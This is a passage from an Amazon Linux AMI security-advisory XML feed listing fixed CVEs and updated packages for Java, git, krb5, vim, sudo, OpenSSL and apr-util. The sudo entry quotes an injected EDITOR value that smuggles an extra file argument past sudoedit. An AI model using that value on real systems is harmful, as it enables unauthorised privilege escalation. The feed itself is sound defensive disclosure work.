Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Lightweight HTTP Server). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21626:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21624:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21619:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21619" title="" id="CVE-2022-21619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21624" title="" id="CVE-2022-21624" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21626" title="" id="CVE-2022-21626" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21628" title="" id="CVE-2022-21628" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.352.b08-2.70.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.352.b08-2.70.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1679</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1679: important priority package update for git</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:13:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41903:
Git is distributed revision control system. `git log` can display commits in an arbitrary format using its `--format` specifiers. This functionality is also exposed to `git archive` via the `export-subst` gitattribute. When processing the padding operators, there is a integer overflow in `pretty.c::format_and_pad_commit()` where a `size_t` is stored improperly as an `int`, and then added as an offset to a `memcpy()`. This overflow can be triggered directly by a user running a command which invokes the commit formatting machinery (e.g., `git log --format=...`). It may also be triggered indirectly through git archive via the export-subst mechanism, which expands format specifiers inside of files within the repository during a git archive. This integer overflow can result in arbitrary heap writes, which may result in arbitrary code execution. The problem has been patched in the versions published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade. Users who are unable to upgrade should disable `git archive` in untrusted repositories. If you expose git archive via `git daemon`, disable it by running `git config --global daemon.uploadArch false`.
CVE-2022-23521:
Git is distributed revision control system. gitattributes are a mechanism to allow defining attributes for paths. These attributes can be defined by adding a `.gitattributes` file to the repository, which contains a set of file patterns and the attributes that should be set for paths matching this pattern. When parsing gitattributes, multiple integer overflows can occur when there is a huge number of path patterns, a huge number of attributes for a single pattern, or when the declared attribute names are huge. These overflows can be triggered via a crafted `.gitattributes` file that may be part of the commit history. Git silently splits lines longer than 2KB when parsing gitattributes from a file, but not when parsing them from the index. Consequentially, the failure mode depends on whether the file exists in the working tree, the index or both. This integer overflow can result in arbitrary heap reads and writes, which may result in remote code execution. The problem has been patched in the versions published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade. There are no known workarounds for this issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23521" title="" id="CVE-2022-23521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41903" title="" id="CVE-2022-41903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-debuginfo" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-core" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-core-doc" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-instaweb" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-svn" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git-instaweb" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.38.3-1.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1680</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1680: important priority package update for krb5</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-42898:
Integer overflow vulnerabilities in PAC parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898" title="" id="CVE-2022-42898" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-server" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-55.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1681</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1681: medium priority package update for vim</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0049:
Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.1143.
CVE-2022-4292:
Use After Free in GitHub repository vim/vim prior to 9.0.0882.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4292" title="" id="CVE-2022-4292" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0049" title="" id="CVE-2023-0049" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-debuginfo" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1160-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1160-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1160-1.1.amzn1.noarch.rpm</filename></package><package name="vim-enhanced" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1160-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1160-1.1.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1160-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1160-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1160-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1160-1.1.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1160-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1682</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1682: important priority package update for sudo</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-22809:
In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809" title="" id="CVE-2023-22809" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo-debuginfo" version="1.8.23" release="10.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.23-10.57.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.23-10.57.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.23" release="10.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.23-10.57.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.23" release="10.57.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.23-10.57.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.57.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.23-10.57.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="10.57.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.23-10.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1683</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1683: important priority package update for openssl</title><issued date="2023-02-03 23:39:00" /><updated date="2023-02-08 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0286:
A type confusion vulnerability was found in OpenSSL when OpenSSL X.400 addresses processing inside an X.509 GeneralName. When CRL checking is enabled (for example, the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or cause a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, of which neither needs a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. In this case, this vulnerability is likely only to affect applications that have implemented their own functionality for retrieving CRLs over a network.
CVE-2023-0215:
A use-after-free vulnerability was found in OpenSSL's BIO_new_NDEF function. The public API function BIO_new_NDEF is a helper function used for streaming ASN.1 data via a BIO. It is primarily used internally by OpenSSL to support the SMIME, CMS, and PKCS7 streaming capabilities, but it may also be called directly by end-user applications. The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter BIO onto the front of it to form a BIO chain, and then returns the new head of the BIO chain to the caller. Under certain conditions. For example, if a CMS recipient public key is invalid, the new filter BIO is freed, and the function returns a NULL result indicating a failure. However, in this case, the BIO chain is not properly cleaned up, and the BIO passed by the caller still retains internal pointers to the previously freed filter BIO. If the caller then calls BIO_pop() on the BIO, a use-after-free will occur, possibly resulting in a crash.
CVE-2022-4304:
A timing-based side channel exists in the OpenSSL RSA Decryption implementation, which could be sufficient to recover a ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption, an attacker would have to be able to send a very large number of trial messages for decryption. This issue affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP, and RSASVE.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304" title="" id="CVE-2022-4304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215" title="" id="CVE-2023-0215" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286" title="" id="CVE-2023-0286" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.162.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.162.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.162.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.162.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.162.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.162.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.162.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.162.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.162.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.162.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1684</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1684: medium priority package update for apr-util</title><issued date="2023-02-13 20:36:00" /><updated date="2023-05-23 19:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-25147:
Integer Overflow or Wraparound vulnerability in apr_base64 functions of Apache Portable Runtime Utility (APR-util) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime Utility (APR-util) 1.6.1 and prior versions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25147" title="" id="CVE-2022-25147" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apr-util-mysql" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-mysql-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-pgsql" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-pgsql-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-devel" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-devel-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-odbc" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-odbc-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-ldap" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-ldap-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-openssl" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-openssl-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-sqlite" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-sqlite-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-nss" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-nss-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-freetds" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-freetds-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-debuginfo" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-debuginfo-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-devel" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-devel-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-openssl" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-openssl-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-sqlite" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-sqlite-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-freetds" version="1.5.4" release="6.19.amzn1" 